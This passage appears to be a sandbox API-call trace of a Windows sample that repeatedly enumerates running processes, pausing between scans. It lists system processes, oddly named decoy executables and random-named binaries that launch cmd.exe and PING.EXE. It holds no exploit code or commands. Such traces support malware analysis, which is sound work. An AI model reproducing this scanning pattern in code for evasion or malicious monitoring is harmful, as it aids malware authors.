szExeFile="[System Process]")) returned 1 [0101.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.186] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0101.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0101.207] CloseHandle (hObject=0xbc) returned 1 [0101.207] Sleep (dwMilliseconds=0x12c) [0101.531] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0101.538] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.557] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 